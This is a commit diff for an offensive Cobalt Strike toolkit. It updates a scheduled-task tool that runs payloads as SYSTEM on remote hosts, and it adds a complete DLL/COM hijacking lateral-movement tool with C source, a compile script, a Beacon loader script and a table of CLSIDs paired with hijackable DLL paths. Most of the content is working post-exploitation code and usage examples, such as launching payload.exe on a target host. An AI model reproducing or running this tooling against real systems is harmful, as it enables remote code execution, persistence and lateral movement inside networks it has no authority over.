new tool update

KIT/AddTaskScheduler/README.md

@@ -1,7 +1,7 @@
 # AddTaskScheduler
 This tool can be used to create a scheduled task on the current system or a remote host. It supports multiple trigger options. If the tool is running with elevated privileges, it will automatically set the `Run whether user is logged on or not` security option as `NT AUTHORITY\SYSTEM`. 
 
->As a rule of thumb, setting a scheduled task for any user but yourself, requires elevated privileges. Furthermore, the tool returns error codes if the operation fails. The most common error codes are: 80070005 (not enough privileges), 80041318/80041319 (most likely you made a typo in one of the input fields), and 80070002 (scheduled task doesn't exist). 
+>As a rule of thumb, setting a scheduled task for any user but yourself, requires elevated privileges. Furthermore, the tool returns error codes if the operation fails. The most common error codes are: 80070005 (not enough privileges) and 80041318/80041319 (most likely you made a typo in one of the input fields). 
 
 ## Basic parameters
 * `taskName`: The name of the scheduled task.
@@ -27,17 +27,17 @@ This tool can be used to create a scheduled task on the current system or a remo
 * `repeatTask`: Set "Repeat task every x minutes/hours" option in format `PT2H` with a duration of `Indefinitely`.
 
 ## Usage
-* `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" onetime <startTime> <(optional) repeatTask>`
-* `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" daily <startTime> <(optional) expireTime> <(optional) daysInterval> <(optional) delay>`
-* `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" logon <(optional) userID>`
-* `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" startup <(optional) delay>`
-* `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" lock <(optional) userID> <(optional) delay>`
-* `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" unlock <(optional) userID> <(optional) delay>`
+* OneTime trigger: `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" onetime <startTime> <(optional) repeatTask>`
+* Daily trigger: `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" daily <startTime> <(optional) expireTime> <(optional) daysInterval> <(optional) delay>`
+* Logon trigger: `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" logon <(optional) userID>`
+* Startup trigger: `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" startup <(optional) delay>`
+* Lock trigger: `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" lock <(optional) userID> <(optional) delay>`
+* Unlock trigger: `addtaskscheduler <taskName> <(optional) hostName> <programPath> "<(optional) programArguments>" unlock <(optional) userID> <(optional) delay>`
 
 ## Examples
-* `addtaskscheduler ExampleTask "" C:\Users\Public\Downloads\payload.exe "" onetime 2023-03-24T12:08:00 PT3H`
-* `addtaskscheduler ExampleTask "" C:\Windows\System32\cmd.exe "/c C:\Windows\System32\calc.exe" daily 2023-03-24T12:08:00 2023-03-28T12:14:00 1 PT2H`
-* `addtaskscheduler ExampleTask DB01.example.local C:\Users\Public\Downloads\payload.exe "" startup PT1M`
+* OneTime trigger example: `addtaskscheduler ExampleTask "" C:\Users\Public\Downloads\payload.exe "" onetime 2023-03-24T12:08:00 PT3H`
+* Daily trigger example: `addtaskscheduler ExampleTask "" C:\Windows\System32\cmd.exe "/c C:\Windows\System32\calc.exe" daily 2023-03-24T12:08:00 2023-03-28T12:14:00 1 PT2H`
+* Startup trigger example: `addtaskscheduler ExampleTask DB01.example.local C:\Users\Public\Downloads\payload.exe "" startup PT1M`
 
 ## Compile
 - 1\. Make sure Visual Studio is installed and supports C/C++.

KIT/AddTaskScheduler/addtaskscheduler.c

@@ -254,6 +254,8 @@ BOOL CreateScheduledTask(char* triggerType, wchar_t* taskName, wchar_t * host, w
 	IPrincipal* pPrincipal = NULL;
 	hr = pTaskDefinition->lpVtbl->get_Principal(pTaskDefinition, &pPrincipal);
 	if (SUCCEEDED(hr)) {
+		//pPrincipal->lpVtbl->put_LogonType(pPrincipal, TASK_LOGON_INTERACTIVE_TOKEN); //USE THIS LINE INSTEAD OF THE BELOW "If statement" IF ENCOUNTERING ERROR CODE: 80041310 (SYSTEM security option is not set correctly and remains NULL)
+		
 		if (IsElevated() || isRemoteHost) {
 			BeaconPrintf(CALLBACK_OUTPUT, "[*] Running in elevated context and setting \"Run whether user is logged on or not\" security option as SYSTEM!\n"); 
 			BSTR systemUser = OLEAUT32$SysAllocString(L"SYSTEM");
@@ -262,6 +264,7 @@ BOOL CreateScheduledTask(char* triggerType, wchar_t* taskName, wchar_t * host, w
 		}else {
 			pPrincipal->lpVtbl->put_LogonType(pPrincipal, TASK_LOGON_INTERACTIVE_TOKEN);
 		}
+		
 		pPrincipal->lpVtbl->Release(pPrincipal);
 	}
 	

KIT/DllComHijacking/README.md

@@ -0,0 +1,36 @@
+# DllComHijacking
+This tool is capable of instantiating a COM object based on a provided CLSID on a designated host, which initiates the corresponding process. By focusing on processes susceptible to DLL hijacking and utilizing a gained position that allows writing to the directories from which these processes load their modules, (remote) code execution can be achieved. Consequently, this technique can be effectively employed for lateral movement. 
+
+>Note that before running this tool, the proxy DLL must be manually placed in the correct directory. Additionally, it's important to note that most initiated processes are active for only a brief duration. Therefore, ensure that the proxy DLL performs an action appropriate for such short-lived scenarios.
+
+Below are a couple examples (in some casus, there are multiple missing DLL's):
+| CLSID | Process | DLL hijacking option | 
+| --- | --- | --- | --- |
+| {94E03510-31B9-47a0-A44E-E932AC86BB17} | wmlaunch.exe | C:\Program Files\Windows Media Player\MPR.dll |
+| {494C063B-1024-4DD1-89D3-713784E82044} | PrintBrmEngine.exe | C:\Windows\System32\spool\tools\VERSION.dll |
+| {73FDDC80-AEA9-101A-98A7-00AA00374959} | wordpad.exe | C:\Program Files\Windows NT\Accessories\MFC42u.dll |
+| {1E2D67D6-F596-4640-84F6-CE09D630E983} | ShapeCollector.exe | C:\Program Files\Common Files\microsoft shared\ink\DUI70.dll |
+
+
+## Arguments
+* `[<CLSID>]` The CLSID of the COM class that is associated with the vulnerable process.
+* `[<target>]` The FQDN, hostname or IP of the designated host (can be remote- or the local host).
+
+
+## Usage
+* `dllcomhijacking <CLSID> <target>`
+
+
+## Example
+* `dllcomhijacking {73FDDC80-AEA9-101A-98A7-00AA00374959} target.example.local`
+
+
+## Compile
+- 1\. Make sure Visual Studio is installed and supports C/C++.
+- 2\. Open the `x64 Native Tools Command Prompt for VS <2019/2022>` terminal.
+- 3\. Run the `bofcompile.bat` script to compile the object file. 
+- 4\. In Cobalt strike, use the script manager to load the .cna script to import the tool. 
+
+
+## Acknowledgements
+This tool is based on the [dcomhijack](https://github.com/WKL-Sec/dcomhijack) project from WKL-Sec.

KIT/DllComHijacking/beacon.h

@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

KIT/DllComHijacking/bofcompile.bat

@@ -0,0 +1,5 @@
+@ECHO OFF
+
+cl.exe /nologo /c /Od /MT /W0 /GS- /Tc dllcomhijacking.c
+move /y dllcomhijacking.obj dllcomhijacking.o
+

KIT/DllComHijacking/dllcomhijacking.c

@@ -0,0 +1,78 @@
+#include <stdio.h>
+#include <Windows.h>
+#include <objbase.h>
+#include <oleauto.h>
+#include <wbemidl.h>
+#include "dllcomhijacking.h"
+#include "beacon.h"
+
+#pragma comment(lib, "ole32.lib")
+#pragma comment(lib, "oleaut32.lib")
+
+
+void InstantiateCOMObject(LPCOLESTR clsidString, WCHAR remoteHost[]) {
+    IID iid;
+    HRESULT hr = OLE32$CLSIDFromString(clsidString, &iid);
+	if (FAILED(hr)) {
+		if (hr == 0x800401f3) {
+			BeaconPrintf(CALLBACK_ERROR, "The provided CLSID format \"%S\" is not correct (error code: 0x800401f3).\n", clsidString);
+		} else {
+			BeaconPrintf(CALLBACK_ERROR, "CLSIDFromString failed with error code: 0x%08lx\n", hr);
+		}
+		return;
+	}
+
+    hr = OLE32$CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
+    if (FAILED(hr)) {
+        BeaconPrintf(CALLBACK_ERROR, "CoInitialize failed with error code: 0x%08lx\n", hr);
+        return;
+    }
+
+    COAUTHINFO authInfo = {0};
+    authInfo.dwAuthnSvc = RPC_C_AUTHN_WINNT;
+    authInfo.dwAuthzSvc = RPC_C_AUTHZ_NONE;
+    authInfo.pwszServerPrincName = NULL;
+    authInfo.dwAuthnLevel = RPC_C_AUTHN_LEVEL_DEFAULT;
+    authInfo.dwImpersonationLevel = RPC_C_IMP_LEVEL_IMPERSONATE;
+    authInfo.pAuthIdentityData = NULL;
+    authInfo.dwCapabilities = EOAC_NONE;
+
+    COSERVERINFO serverInfo = {0};
+    serverInfo.pwszName = remoteHost;
+    serverInfo.pAuthInfo = &authInfo;
+
+	IID IIDIUnknown = {0x00000000, 0x0000, 0x0000, {0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46}};
+    MULTI_QI mqi = {0};
+    mqi.pIID = &IIDIUnknown; 
+
+    hr = OLE32$CoCreateInstanceEx(&iid, NULL, CLSCTX_REMOTE_SERVER, &serverInfo, 1, &mqi);
+    if (FAILED(hr)) {
+		if (hr == 0x80040154) {
+			BeaconPrintf(CALLBACK_ERROR, "Instantiating the COM object failed because it is not registered on the target system (error code: 0x80040154).\n", clsidString);
+		} else {
+			BeaconPrintf(CALLBACK_ERROR, "CoCreateInstanceEx failed with error code: 0x%08lx\n", hr);
+		} 
+    } else {
+        BeaconPrintf(CALLBACK_OUTPUT, "==========================================\n[+] COM object instantiated successfully!\n");
+    }
+
+	if (mqi.pItf) mqi.pItf->lpVtbl->Release(mqi.pItf);
+    OLE32$CoUninitialize();
+}
+
+
+int go(char *args, int len) {
+	datap parser;
+    LPCOLESTR* clsidString = L"";
+    WCHAR* host = L""; 
+	
+	BeaconDataParse(&parser, args, len);
+	clsidString = BeaconDataExtract(&parser, NULL);
+	host = BeaconDataExtract(&parser, NULL);
+
+    InstantiateCOMObject(clsidString, host);
+    return 0;
+}
+
+
+

KIT/DllComHijacking/dllcomhijacking.cna

@@ -0,0 +1,40 @@
+# author REDMED-X
+
+beacon_command_register(
+	"dllcomhijacking", "Leverage DLL Hijacking by instantiating a COM object on a target host",
+	"INFO:\nInstantiate a COM object on a target host that will start the associated process which is vulnerable to DLL Hijacking. This allows for (remote) code execution and is therefore a good lateral movement technique.\nReminder: place the proxy DLL in the correct location before running this tool.\n\n" .
+	"ARGUMENTS:\n[<CLSID>]: The CLSID of the COM class that is associated with the vulnerable process.\n[<target>]: The FQDN, hostname or IP of the target host (can be remote- or the local host).\n\n" .
+	"USAGE:\ndllcomhijacking <CLSID> <target>\n\n" .
+	"EXAMPLES:\ndllcomhijacking {73FDDC80-AEA9-101A-98A7-00AA00374959} target.example.local\n\n");
+	
+alias dllcomhijacking {
+    $bid = $1;
+    $clsid = $2;
+    $target = $3;
+
+    if ($clsid eq "") {
+        berror($bid, "Please specify one TEXT\n");
+        return;
+    }
+
+    if ($target eq "") {
+		berror($bid, "Please specify the TEXT.\n");
+		return;
+    }
+	
+    # Read in the right BOF file
+    $handle = openf(script_resource("dllcomhijacking.o"));
+    $data   = readb($handle, -1);
+    closef($handle);
+
+    # Pack our arguments
+    $arg_data  = bof_pack($bid, "ZZ", $clsid, $target);
+
+    blog($bid, "Tasked to instantiate a (remote) COM object..");
+    beacon_inline_execute($bid, $data, "go", $arg_data);
+}
+
+
+
+
+

KIT/DllComHijacking/dllcomhijacking.h

@@ -0,0 +1,7 @@
+#include <windows.h>  
+
+//InstantiateCOMObject
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID pvReserved, DWORD dwCoInit);
+DECLSPEC_IMPORT void WINAPI OLE32$CoUninitialize(void);
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstanceEx(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, COSERVERINFO *pServerInfo, DWORD dwCount, MULTI_QI *pResults);
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString(LPCOLESTR lpsz, LPCLSID pclsid);

OperatorsKit.cna

@@ -1090,6 +1090,44 @@ alias systeminfo {
 
 }
 
+beacon_command_register(
+	"dllcomhijacking", "Leverage DLL Hijacking by instantiating a COM object on a target host",
+	"INFO:\nInstantiate a COM object on a target host that will start the associated process which is vulnerable to DLL Hijacking. This allows for (remote) code execution and is therefore a good lateral movement technique.\nReminder: place the proxy DLL in the correct location before running this tool.\n\n" .
+	"ARGUMENTS:\n[<CLSID>]: The CLSID of the COM class that is associated with the vulnerable process.\n[<target>]: The FQDN, hostname or IP of the target host (can be remote- or the local host).\n\n" .
+	"USAGE:\ndllcomhijacking <CLSID> <target>\n\n" .
+	"EXAMPLES:\ndllcomhijacking {73FDDC80-AEA9-101A-98A7-00AA00374959} target.example.local\n\n");
+	
+alias dllcomhijacking {
+    $bid = $1;
+    $clsid = $2;
+    $target = $3;
+
+    if ($clsid eq "") {
+        berror($bid, "Please specify one TEXT\n");
+        return;
+    }
+
+    if ($target eq "") {
+		berror($bid, "Please specify the TEXT.\n");
+		return;
+    }
+	
+    # Read in the right BOF file
+    $handle = openf(script_resource("KIT/DllComHijacking/dllcomhijacking.o"));
+    $data   = readb($handle, -1);
+    closef($handle);
+
+    # Pack our arguments
+    $arg_data  = bof_pack($bid, "ZZ", $clsid, $target);
+
+    blog($bid, "Tasked to instantiate a (remote) COM object..");
+    beacon_inline_execute($bid, $data, "go", $arg_data);
+}
+
+
+
+
+
 
 
 

README.md

@@ -17,6 +17,7 @@ The following tools are currently in the OperatorsKit:
 |**[DelFirewallRule](KIT/DelFirewallRule)**|Delete a firewall rule.|
 |**[DelLocalCert](KIT/DelLocalCert)**|Delete a local computer certificate from a specific store.|
 |**[DelTaskScheduler](KIT/DelTaskScheduler)**|Delete a scheduled task on the current- or a remote host.|
+|**[DllComHijacking](KIT/DllComHijacking)**|Leverage DLL Hijacking by instantiating a COM object on a target host |
 |**[DllEnvHijacking](KIT/DllEnvHijacking)**|BOF implementation of DLL environment hijacking published by [Wietze](https://www.wietzebeukema.nl/blog/save-the-environment-variables).|
 |**[EnumDotnet](KIT/EnumDotnet)**|Enumerate processes that most likely have .NET loaded.|
 |**[EnumExclusions](KIT/EnumExclusions)**|Check the AV for excluded files, folders, extentions and processes.|